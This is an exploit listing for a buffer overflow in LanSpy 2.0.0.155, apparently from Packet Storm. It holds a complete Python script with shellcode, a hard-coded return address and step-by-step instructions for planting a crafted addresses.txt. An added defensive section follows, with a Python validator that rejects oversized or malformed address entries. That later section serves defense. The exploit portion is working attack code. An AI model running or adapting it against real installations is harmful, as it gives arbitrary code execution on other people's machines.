LanSpy 2.0.0.155 Buffer Overflow

17 Oct 2016 00:00:00 | Reported by n30m1nd | Type: packetstorm | Source: packetstormsecurity.com

LanSpy 2.0.0.155 Buffer Overflow Exploit by n30m1nd on Win7 and Win10

Code

```python
#!/usr/bin/python

### LanSpy 2.0.0.155 - Buffer Overflow Exploit by n30m1nd ###

# Date: 2016-10-18
# Exploit Author: n30m1nd
# Vendor Homepage: www.lantricks.com
# Software Link: https://www.exploit-db.com/apps/42114d0f9e88ad76acaa0f145dabf923-lanspy_setup.exe
# Version: LanSpy 2.0.0.155
# Tested on: Tested on Win7 32bit and Win10 64 bit

# Platforms
# =========
# Tested on Win7 32bit and Win10 64 bit
# This exploit should work everywhere since the binary does not implement DEP nor ASLR

# Credits
# =======
# Shouts to hyp3rlinx for the PoC:
# https://www.exploit-db.com/exploits/38399/
# http://hyp3rlinx.altervista.org/
# And shouts to the crew at Offensive Security for their huge efforts on making
# the infosec community better

# How to
# ======
# * Run this python script. It will generate an "addresses.txt" file.
# * Replace this file in the root directory of your LanSpy.exe installation.
# * Run LanSpy.exe and start the scan or do so by pressing F3.
# - You can also call LanSpy.exe from the command line like the following and
# it will run the exploit straight away: echo n30 | C:\Path\To\LanSpy.exe

# Exploit code
# ============

import struct

# 32bit Alphanum-ish shellcodes
# Bad chars detected: 00 2d 20

# MessageBoxA at => 00404D80
msgbox_shellcode = (
"\x31\xC0\x50\x68"
"\x70\x77\x6E\x64"
"\x54\x5F\x50\x57"
"\x57\x50\x35\xC4"
"\x80\x80\x55\x35"
"\x44\xCD\xC0\x55"
"\x50\xC3"
)

# WinExec at -> 004EC4FF
calc_shellcode = (
"\x31\xC0\x50\x68"
"\x63\x61\x6C\x63"
"\x54\x5F\x50\x57"
"\x35\xC3\x4E\xC3"
"\x55\x35\x3C\x8A"
"\x8D\x55\x50\xC3"
)

# Change the shellcode to be used here
scde = calc_shellcode
#scde = msgbox_shellcode

# 126 are the bytes to jmp back with opcode \x74\x80 => ja -80h and it is where our shellcode resides
junk = 'A'*(676-126)
if len(scde) > 126:
    exit("[e] Shellcode is too big! Egghunter maybe? ;)")

# 0040407D => jmp ecx inside LanSpy
jecx = 'A'*(126-len(scde))+'\x74\x80CC'+struct.pack('<I', 0x0040407D)

# Junk + Shellcode for calc + jump to our first stage jump which jumps to the second stage calc shellcode
payl = junk + scde + jecx

# The 'with' block closes the file on exit; no explicit close() is needed
with open("addresses.txt", "wb") as f:
    f.write(payl)
```
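What a defender takes from the script above is the trigger: a single line in addresses.txt that is hundreds of bytes longer than any host name or IP address can be, which the program copies into a fixed-size buffer without a length check. The Python validator below is an added example, not part of the original exploit and not LanSpy's own code; it assumes the file holds one target per line (the shape the script above writes) and rejects any entry that is oversized, contains non-printable bytes, or is not an IP address or a syntactically valid hostname. That is the input check a parser of such a file should apply before copying an entry anywhere. The 253-byte cap (the DNS limit for a fully qualified name) and the sample file are constructed for this example.

```python
import ipaddress
import re

# Length budget for a single entry. The exploit above needs 676 bytes of filler
# before it reaches the saved return address, so a legitimate host list never
# comes anywhere near that. The cap here (253 bytes, the DNS maximum for a fully
# qualified name) is an assumption for this example, not a value taken from LanSpy.
MAX_ENTRY_LEN = 253

# Hostname label: letters, digits and hyphens, 1-63 chars, no leading/trailing '-'
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
HOSTNAME_RE = re.compile(rf"^{_LABEL}(\.{_LABEL})*\.?$")


def classify_entry(raw: bytes) -> tuple:
    """Return (ok, reason) for a single line of an address list.

    A line is accepted only if it is short, decodes as ASCII, carries no
    control characters, and is either an IP address or a valid hostname.
    Everything else is rejected with a reason suitable for logging.
    """
    line = raw.rstrip(b"\r\n")
    if len(line) > MAX_ENTRY_LEN:
        return False, f"entry too long ({len(line)} bytes > {MAX_ENTRY_LEN})"
    try:
        text = line.decode("ascii")
    except UnicodeDecodeError:
        return False, "non-ASCII bytes in entry"
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in text):
        return False, "control characters in entry"
    text = text.strip()
    if not text:
        return True, "blank line"
    try:
        ipaddress.ip_address(text)
        return True, "ip address"
    except ValueError:
        pass
    if HOSTNAME_RE.match(text):
        return True, "hostname"
    return False, "not an IP address or hostname"


def check_address_file(data: bytes) -> dict:
    """Validate a whole file; returns counts plus the rejected line numbers."""
    result = {"lines": 0, "accepted": 0, "rejected": []}
    for lineno, raw in enumerate(data.splitlines(keepends=True), start=1):
        result["lines"] += 1
        ok, reason = classify_entry(raw)
        if ok:
            result["accepted"] += 1
        else:
            result["rejected"].append((lineno, reason))
    return result


# Constructed sample: two benign entries followed by an entry of the shape the
# script above writes (long filler, then non-ASCII bytes). The trailing bytes
# are arbitrary placeholders chosen for this example.
SAMPLE_FILE = (
    b"192.168.1.10\r\n"
    b"fileserver.example.internal\r\n"
    + b"A" * 676 + b"\x90\x90\x90\x90\r\n"
)

if __name__ == "__main__":
    report = check_address_file(SAMPLE_FILE)
    print(f"{report['accepted']} of {report['lines']} entries accepted")
    for lineno, reason in report["rejected"]:
        print(f"  line {lineno}: rejected, {reason}")
```

Running the block on the constructed sample accepts the two real targets and rejects the third line as over-length before any of its bytes are looked at; an application that reads such a file should fail closed on the first rejected entry rather than skip it, so that a tampered file is noticed.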
